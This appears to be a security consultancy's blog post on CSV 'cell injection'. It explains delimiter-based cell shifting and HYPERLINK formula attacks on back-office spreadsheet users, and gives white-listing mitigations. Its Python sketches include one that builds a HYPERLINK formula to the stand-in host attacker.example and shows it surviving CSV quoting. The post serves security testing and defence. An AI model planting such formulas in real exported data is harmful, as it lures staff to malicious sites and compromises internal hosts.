[Introduction]

At 7 Elements, our approach to application security testing blends the identification of technical exposure with that of business logic flaws, either of which could lead to a breach in security. By taking this approach, and by understanding the business context and envisaged use, it is possible to provide a deeper level of assurance. We have used this approach to identify a novel attack that we have called cell injection.

[What is Cell Injection?]

Cell injection occurs where a user is able to inject valid spreadsheet function calls or valid delimited values into a spreadsheet via a web front end, with unintended consequences. A number of attacks exist, from simple data pollution to more harmful calls to external sources.

[Basic injection technique]

At a simple level, we can look to inject values that we expect to be interpreted as valid Comma-Separated Values (CSV) delimiters. Although CSV is a widely used format, there is still no formal specification, which according to RFC 4180 "allows for a wide variety of interpretations of CSV files". As such, we should look to inject common delimiters such as the semicolon, comma or tab, but also other values such as the ASCII characters "|", "+" and "^".

If these values are interpreted by the spreadsheet, then you can expect data pollution to occur, because cells are shifted from their expected location. The following example shows the "|" character being used to insert additional cells within a spreadsheet. This was done by inserting four "|" values within the 'Amount' field, which results in the values expected within D4 and E4 appearing in H4 and I4 instead:
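The cell shift described above can be reproduced with a minimal Python sketch. It assumes a hypothetical export routine that simply joins fields with "|", and a five-column row in which 'Amount' is the third column; the field names and values are illustrative and are not taken from the test application. The second function shows, for comparison, how quoting every field keeps the injected delimiters inside a single cell.

```python
import csv
import io


def naive_export(row, delimiter="|"):
    # Hypothetical exporter: joins raw field values without any quoting.
    return delimiter.join(row)


def quoted_export(row, delimiter="|"):
    # Same row written with the csv module, quoting every field.
    buf = io.StringIO()
    csv.writer(buf, delimiter=delimiter, quoting=csv.QUOTE_ALL).writerow(row)
    return buf.getvalue().rstrip("\r\n")


def parse(line, delimiter="|"):
    # Read one exported line back into a list of cells.
    return next(csv.reader([line], delimiter=delimiter))


# Illustrative row: columns A..E, with four "|" injected into 'Amount' (column C).
row = ["2013-01-01", "alice", "10||||", "GBP", "ref-1"]

naive_cells = parse(naive_export(row))
quoted_cells = parse(quoted_export(row))

# Column letter in which the value intended for column D ("GBP") ends up.
shifted_column = "ABCDEFGHI"[naive_cells.index("GBP")]
```

With the naive exporter, the row is read back as nine cells and the value intended for column D lands in column H, matching the four-column shift described above. With quoting applied, the row is read back unchanged.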

Where it is possible to insert the "=" sign, we can then attempt to use function calls within the spreadsheet.

Microsoft lists all of the available functions; however, the one we are interested in for the purpose of attack is the HYPERLINK function, which has the following syntax:

HYPERLINK(link_location,friendly_name)

What can you do with it? Firstly, we need to change the injected string to point to an external site under our control. For this example we will use our web site by submitting the following string:

If the friendly_name specified is created within the spreadsheet, then we have successfully injected our data:

Within Microsoft Excel, a user clicking on this link will not be prompted for any confirmation that they are about to visit an external link. A single click will be enough to launch a browser and load the destination address. Using this approach, an attacker could configure the URL to point to a malicious site containing browser-based malware, and so attempt to compromise the client browser and gain access to the underlying operating system.
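To illustrate why delimiter quoting alone does not stop this attack, the following Python sketch builds a HYPERLINK string from the syntax given earlier and passes it through a fully quoted CSV round trip. The URL `http://attacker.example/` is a placeholder and the helper names are hypothetical; this is not the string used in our test.

```python
import csv
import io


def hyperlink_formula(link_location, friendly_name):
    # Builds a string following HYPERLINK(link_location,friendly_name).
    return '=HYPERLINK("{}","{}")'.format(link_location, friendly_name)


def round_trip(row):
    # Write the row with every field quoted, then read it back.
    buf = io.StringIO()
    csv.writer(buf, quoting=csv.QUOTE_ALL).writerow(row)
    return next(csv.reader(io.StringIO(buf.getvalue())))


# Placeholder destination and label, for illustration only.
payload = hyperlink_formula("http://attacker.example/", "Click Here")
cells = round_trip(["alice", payload])

# The cell content survives quoting intact and still begins with "=".
still_formula = cells[1] == payload and cells[1].startswith("=")
```

CSV quoting escapes the embedded double quotes so the field stays in one cell, but the value read back is still the original string beginning with "=". Whether that value is then evaluated as a function depends on the application that opens the file.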

[Advanced Injection]

The basic HYPERLINK attack requires that you can inject double quotation marks around the link_location and friendly_name values. As double quotes are commonly filtered out of input, the basic attack may fail. To bypass this restriction, it is possible to use a more advanced technique to generate a valid HYPERLINK function. This approach references other cells within the spreadsheet and therefore removes the requirement to supply double quotes. To use this approach, you will need to set one cell as the "friendly_name" and a second cell as the "link_location". Lastly, you will need to inject the HYPERLINK function so that it references the locations of these cells. The following string shows such an attack:

As part of this Proof of Concept, we have hard-coded the cell values E4 and F4, but we believe it should be possible to dynamically create these using the ROW() and COLUMN() functions. Using this approach we can then create the 'Click Here' cell without the need for double quotes:

During our tests we have also identified other attack vectors, such as updating fields or cell value lookup functions, where we do not have direct access to the content from the web application. This could be used to overwrite data for our own gain or populate a cell that is then later used to echo out data to a client with a value from a normally hidden cell.

[Mitigation]

As this attack is focused on the end user of the spreadsheet, mitigation is best placed at the point the data is first input. As such, we would recommend that user input is validated based upon what is required. The best method of doing this is via 'white-listing'. Where possible, all characters that have a valid meaning within the destination spreadsheet should be removed from your white-list of valid characters. We would also recommend that, where possible, you do not permit the equals sign as the first character in a field.
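As a minimal sketch of this kind of white-list validation, the Python below accepts a value only if every character falls within a per-field set of permitted characters. The patterns, field types and length limits are assumptions chosen for illustration; a real white-list should be derived from what each field genuinely requires.

```python
import re

# Hypothetical white-lists. Neither permits "=", "+", "^", "|", ";", ",",
# tab or double quotes, so a leading equals sign is rejected as well.
FREE_TEXT = re.compile(r"[A-Za-z0-9 ._]{1,64}")
AMOUNT = re.compile(r"[0-9]{1,9}(\.[0-9]{2})?")


def is_valid(value, pattern):
    # Accept the value only if the whole string matches the white-list.
    return pattern.fullmatch(value) is not None


examples = {
    "Rent for March": is_valid("Rent for March", FREE_TEXT),
    "10.50": is_valid("10.50", AMOUNT),
    "10||||": is_valid("10||||", AMOUNT),
    "=HYPERLINK(E4,F4)": is_valid("=HYPERLINK(E4,F4)", FREE_TEXT),
}
```

Rejecting the input outright, rather than trying to strip or escape individual characters, keeps the rule simple: anything outside the white-list never reaches the database, and so never reaches the exported spreadsheet.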

Time for a working example and exploit:

[Setting the scene]



To illustrate this attack and to provide context, we will use a scenario that we often come across during our engagements: the use of third-party provisioned services to deliver transactional functionality. With this type of service, we often find that back-end data management and record retention are achieved through the use of spreadsheets. To help provide a working example, we have developed a dummy transactional website. This site has two main functions: the end-user-facing application and an admin section. Users access the application over the internet to transfer funds electronically. The end organisation uses the admin functionality to manage the site and to view transactions. It is also able to download transactional data for internal processing and data retention. At a high level it would look like this:

[Attack Surface]

The main input fields that an attacker can interact with are as follows:

The application has been designed to provide defence against the OWASP Top 10. Specifically, the application has been coded to defend against common input validation attacks such as SQL Injection and Cross Site Scripting, as well as correctly validating all output that is displayed within the application.



Given this scenario, the attack options will be limited to attacking the 'Back Office' component of this application. Robust security measures, as already discussed, have mitigated attacks against end users of the application, as well as direct attacks against the application and database. On further inspection, and through a manual testing approach that looks at the end-to-end business process involved, it would be noted that the 'Back Office' function of this application relies on the download and use of spreadsheet data:

The data is lifted directly from the database and, on download, results in the spreadsheet opening on the 'Back Office' computer screen:

[Exploit]

The following video shows how an attacker can use cell injection via the front client facing application to compromise an internal host. The attack requires the end user to place trust in the data, but then who doesn't trust content that they have decided to download?

[Conclusion]

By taking the time to understand how data would be input into the system, and more importantly where the data is then output to an end user, we were able to develop a specific attack approach to directly target end users of the data and gain unauthorised access to systems and data.

In this example, correct encoding of user-supplied data in the context of its use had not been fully implemented. Without this level of testing, the application would have appeared to be protected against input / output validation based attacks, which could lead to a false sense of security. Further to this, being able to attack internal hosts directly changes the assumed threat surface and therefore raises issues around browser patch management and the lack of egress filtering in place.

As we have seen from this blog, testing should be more than just the OWASP Top 10. We need to think about the overall context of the application, the business logic in use and, ultimately, where and how our input is used and how it manifests as output. This provides a further example of the need to take a layered approach to security and to accept that you cannot achieve 100% security. It also highlights the need to implement a resilient approach, building upon a robust defensive posture, that takes into account the need to be able to detect, react to and recover from a breach.